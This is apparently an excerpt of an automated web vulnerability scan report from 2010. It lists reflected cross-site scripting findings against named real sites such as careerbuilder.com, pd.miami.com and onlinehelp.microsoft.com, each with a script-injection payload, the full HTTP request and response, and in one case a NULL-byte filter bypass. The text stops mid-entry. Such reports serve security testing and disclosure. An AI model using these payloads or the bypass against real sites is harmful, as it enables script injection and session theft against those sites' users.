GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px13436"><script>alert(1)</script>8ee759e7141&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:30:07 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bpid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ed51'%3balert(1)//60b188e2c5e was submitted in the bpid parameter. This input was echoed as 4ed51';alert(1)//60b188e2c5e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gateway/gw.js?csid=G07610&bpid=S02784ed51'%3balert(1)//60b188e2c5e HTTP/1.1 Host: js.revsci.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Mon, 15 Nov 2010 00:21:33 GMT Cache-Control: max-age=86400, private Expires: Tue, 16 Nov 2010 00:21:33 GMT Content-Type: application/javascript;charset=ISO-8859-1 Date: Mon, 15 Nov 2010 00:21:33 GMT Connection: close Content-Length: 6346
//Vermont-12.4.0-967 var rsi_now= new Date(); var rsi_csid= 'G07610';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){this._rsiaa=Da;this._rsiba= ...[SNIP]... i>>18))+"%"+_rsiCa(0x80+(i>>12&0x3F))+"%"+_rsiCa(0x80+(i>>6&0x3F))+"%"+_rsiCa(0x80+(i&0x3F));}window[rsi_csid]=new rsiClient(rsi_csid); if(window[rsi_csid])window[rsi_csid].DM_addEncToLoc("bpid",'S02784ed51';alert(1)//60b188e2c5e');else DM_addEncToLoc("bpid",'S02784ed51';alert(1)//60b188e2c5e'); function asi_addElem(e){var p=document.body==null?document.getElementsByTagName('head')[0]:document.body;p.insertBefore(e,p.firstChil ...[SNIP]...
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload e12c1<script>alert(1)</script>25550789a86 was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gateway/gw.js?csid=G07610e12c1<script>alert(1)</script>25550789a86&bpid=S0278 HTTP/1.1 Host: js.revsci.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Mon, 15 Nov 2010 00:21:33 GMT Cache-Control: max-age=86400, private Expires: Tue, 16 Nov 2010 00:21:33 GMT Content-Type: application/javascript;charset=ISO-8859-1 Date: Mon, 15 Nov 2010 00:21:32 GMT Connection: close Content-Length: 128
/* * JavaScript include error: * The customer code "G07610E12C1<SCRIPT>ALERT(1)</SCRIPT>25550789A86" was not recognized. */
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2103e<script>alert(1)</script>7435dca659c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /assets/jquery/jScrollPane2103e<script>alert(1)</script>7435dca659c/ HTTP/1.1 Host: kelvinluck.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Sun, 14 Nov 2010 22:27:44 GMT Server: Apache X-Powered-By: PHP/5.2.14 X-Pingback: http://www.kelvinluck.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Sun, 14 Nov 2010 22:27:44 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13137
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Nothing found for ...[SNIP]... <strong>http://www.kelvinluck.com/assets/jquery/jScrollPane2103e<script>alert(1)</script>7435dca659c/</strong> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44196"><script>alert(1)</script>3ac3dc6d2a9 was submitted in the REST URL parameter 3. This input was echoed as 44196\"><script>alert(1)</script>3ac3dc6d2a9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /assets/jquery/jScrollPane44196"><script>alert(1)</script>3ac3dc6d2a9/ HTTP/1.1 Host: kelvinluck.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Sun, 14 Nov 2010 22:27:42 GMT Server: Apache X-Powered-By: PHP/5.2.14 X-Pingback: http://www.kelvinluck.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Sun, 14 Nov 2010 22:27:42 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13208
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Nothing found for ...[SNIP]... <a href="http://2005.kelvinluck.com/assets/jquery/jScrollPane44196\"><script>alert(1)</script>3ac3dc6d2a9/"> ...[SNIP]...
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a78f'-alert(1)-'2c61d5b8e89 was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mf.ic/Florida_Miami/?lr=cbcb_mh2a78f'-alert(1)-'2c61d5b8e89&SiteID=cbcb_mh043 HTTP/1.1 Host: manufacturing.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 200489 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=31c8a9168a324c7db86d4832c28fda33-343071021-R7-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650DB6131B087A38A47B2E951820C5AC2CC5B2E82D3899943FBB7C47BC6A3F46E8B7A2166EDA22B2B1E; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:30:21 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:45:21 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL7 Date: Sun, 14 Nov 2010 22:30:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh2a78f'-alert(1)-'2c61d5b8e89&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f03f"%20a%3db%206b20fd7d40 was submitted in the lr parameter. This input was echoed as 4f03f" a=b 6b20fd7d40 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /mf.ic/Florida_Miami/?lr=cbcb_mh4f03f"%20a%3db%206b20fd7d40&SiteID=cbcb_mh043 HTTP/1.1 Host: manufacturing.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 198344 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=8304050d6cf8407c811aa470d8e5f6d1-343070998-R4-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650B9DECA71415B4B344AA0626B957297F05C7D9A2F0F944124DD6C01CE730577B3DB3E25B34023B418; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:29:57 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:44:57 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL4 Date: Sun, 14 Nov 2010 22:29:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the p_theme request parameter is copied into the HTML document as plain text between tags. The payload %008ed0e<script>alert(1)</script>d58813ac31b was submitted in the p_theme parameter. This input was echoed as 8ed0e<script>alert(1)</script>d58813ac31b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /nl-search/we/Archives?p_multi=EN|&p_product=EN&p_theme=realcities2%008ed0e<script>alert(1)</script>d58813ac31b&p_action=search&p_maxdocs=200&s_site=miami&s_trackval=MH&p_text_search-0= HTTP/1.1 Host: nl.newsbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44c59"%20a%3db%205eb6f2d6390 was submitted in the lr parameter. This input was echoed as 44c59" a=b 5eb6f2d6390 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /np.ic/Florida_Miami/?lr=cbcb_mh44c59"%20a%3db%205eb6f2d6390&SiteID=cbcb_mh044 HTTP/1.1 Host: nonprofit.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 192802 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=c08c85f0ab084f8f980cf516a8699a49-343071164-wr-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650B3A9AEF8176FA9165F0DC617B8A41DBB4614ECA2B5399C5087ECC6D8DD45EEFD09EDB9641CDD258A; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:32:43 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:47:44 GMT; path=/ X-Powered-By: ASP.NET X-PBY: BEAR28 Date: Sun, 14 Nov 2010 22:32:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c4b0'-alert(1)-'e1cb828b728 was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /np.ic/Florida_Miami/?lr=cbcb_mh7c4b0'-alert(1)-'e1cb828b728&SiteID=cbcb_mh044 HTTP/1.1 Host: nonprofit.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 193671 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=d3514a0dd6ee4dd987d69599015f5627-343071191-w2-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC65082533C0B6A15006E7BC1B42D76A4BDB01E298DFB14A0354963421DD88C93932E779431AB1D93ACE6; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:33:11 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:48:11 GMT; path=/ X-Powered-By: ASP.NET X-PBY: BEAR2 Date: Sun, 14 Nov 2010 22:33:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh7c4b0'-alert(1)-'e1cb828b728&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
2.188. http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://onlinehelp.microsoft.com
Path:
/en-US/bing/ff808535.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 125d3"><script>alert(1)</script>70febfd0c58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-US/bing/ff808535.aspx?125d3"><script>alert(1)</script>70febfd0c58=1 HTTP/1.1 Host: onlinehelp.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: A=I&I=AxUFAAAAAAA1BwAA6Vf9zWhAqhs9UEWZy8ydVA!!&M=1; domain=.microsoft.com; expires=Wed, 14-Nov-2040 23:27:59 GMT; path=/ Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Wed, 14-Nov-2040 23:28:00 GMT; path=/ P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:27:59 GMT Content-Length: 43681
The value of the aff request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7cefd'><script>alert(1)</script>08ecacb8cdf was submitted in the aff parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sp?skin=&aff=11097cefd'><script>alert(1)</script>08ecacb8cdf&keywords=&submit=Go HTTP/1.1 Host: pd.miami.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: userId=293008834; Expires=Mon, 14-Nov-2011 22:32:00 GMT; Path=/ Set-Cookie: JSESSIONID=38FCB2DA207BCBB9D35AA629320C5968; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Sun, 14 Nov 2010 22:32:02 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>MiamiHerald.com Search</title> <!-- No include URL entered --> < ...[SNIP]... <a class='on-page' href='/sp?aff=11097cefd'><script>alert(1)</script>08ecacb8cdf&skin=&submit=Go&keywords=&start=1'> ...[SNIP]...
The value of the keywords request parameter is copied into the HTML document as plain text between tags. The payload a29ab<script>alert(1)</script>7d509c47700 was submitted in the keywords parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sp?skin=&aff=1109&keywords=a29ab<script>alert(1)</script>7d509c47700&submit=Go HTTP/1.1 Host: pd.miami.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: userId=293008847; Expires=Mon, 14-Nov-2011 22:32:03 GMT; Path=/ Set-Cookie: JSESSIONID=E2FDD3163D3ACCA75F1716C8CD671BE4; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Sun, 14 Nov 2010 22:32:02 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of the keywords request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f284b"><script>alert(1)</script>34bce5358bd was submitted in the keywords parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sp?skin=&aff=1109&keywords=f284b"><script>alert(1)</script>34bce5358bd&submit=Go HTTP/1.1 Host: pd.miami.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: userId=293008843; Expires=Mon, 14-Nov-2011 22:32:03 GMT; Path=/ Set-Cookie: JSESSIONID=4C6CA1184F2F4D6429BCFB2F707F8A1B; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Sun, 14 Nov 2010 22:32:02 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
2.192. http://pd.miami.com/sp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pd.miami.com
Path:
/sp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8af6"><script>alert(1)</script>0b02c8bd5b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sp?e8af6"><script>alert(1)</script>0b02c8bd5b8=1 HTTP/1.1 Host: pd.miami.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: userId=293008771; Expires=Mon, 14-Nov-2011 22:31:45 GMT; Path=/ Set-Cookie: JSESSIONID=5F4E76F4A7975B2D912E6DDDABD693EC; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Sun, 14 Nov 2010 22:31:53 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>MiamiHerald.com Search</title> <!-- No include URL entered --> < ...[SNIP]... <a href="http://pd.miami.com/sp?skin=&aff=1100&keywords=&e8af6"><script>alert(1)</script>0b02c8bd5b8=1&"> ...[SNIP]...
2.193. http://pd.miami.com/sp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pd.miami.com
Path:
/sp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5a68d'><script>alert(1)</script>2a247e32006 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sp?5a68d'><script>alert(1)</script>2a247e32006=1 HTTP/1.1 Host: pd.miami.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: userId=293008817; Expires=Mon, 14-Nov-2011 22:31:57 GMT; Path=/ Set-Cookie: JSESSIONID=623F113F2B767DD27302847C91959B89; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Sun, 14 Nov 2010 22:31:58 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>MiamiHerald.com Search</title> <!-- No include URL entered --> < ...[SNIP]... <a class='on-page' href='/sp?aff=&5a68d'><script>alert(1)</script>2a247e32006=1&5a68d'> ...[SNIP]...
The value of the skin request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abb94"><script>alert(1)</script>7c71531038e was submitted in the skin parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sp?skin=abb94"><script>alert(1)</script>7c71531038e&aff=1109&keywords=&submit=Go HTTP/1.1 Host: pd.miami.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: userId=293008725; Expires=Mon, 14-Nov-2011 22:31:36 GMT; Path=/ Set-Cookie: JSESSIONID=5E3C42A7A8E3B1A057FB8D90D6456A77; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Sun, 14 Nov 2010 22:31:36 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Local Directory > Miami, FL > Miami Herald</title>
The value of the skin request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bd1a7'><script>alert(1)</script>6a21073105a was submitted in the skin parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sp?skin=bd1a7'><script>alert(1)</script>6a21073105a&aff=1109&keywords=&submit=Go HTTP/1.1 Host: pd.miami.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: userId=293008731; Expires=Mon, 14-Nov-2011 22:31:38 GMT; Path=/ Set-Cookie: JSESSIONID=4B5FA7C0F6A9F5500F6AB02D2769F0E3; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Sun, 14 Nov 2010 22:31:38 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Local Directory > Miami, FL > Miami Herald</title>
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33483"%20a%3db%209e634a2ad91 was submitted in the lr parameter. This input was echoed as 33483" a=b 9e634a2ad91 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /rt.ic/Florida_Miami/?lr=cbcb_mh33483"%20a%3db%209e634a2ad91&SiteID=cbcb_mh045 HTTP/1.1 Host: retail.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 196457 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=4457d6fa83344a578fb8e489d659276d-343071183-XE-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650A3EF5BFA08B152085FF5EB5256808D63408F4E9A5B5C6850C79095234B5F2A3EDC57BB78FC777114; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:33:03 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:48:03 GMT; path=/ X-Powered-By: ASP.NET X-PBY: BEAR45 Date: Sun, 14 Nov 2010 22:33:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59826'-alert(1)-'b0e1b29c015 was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
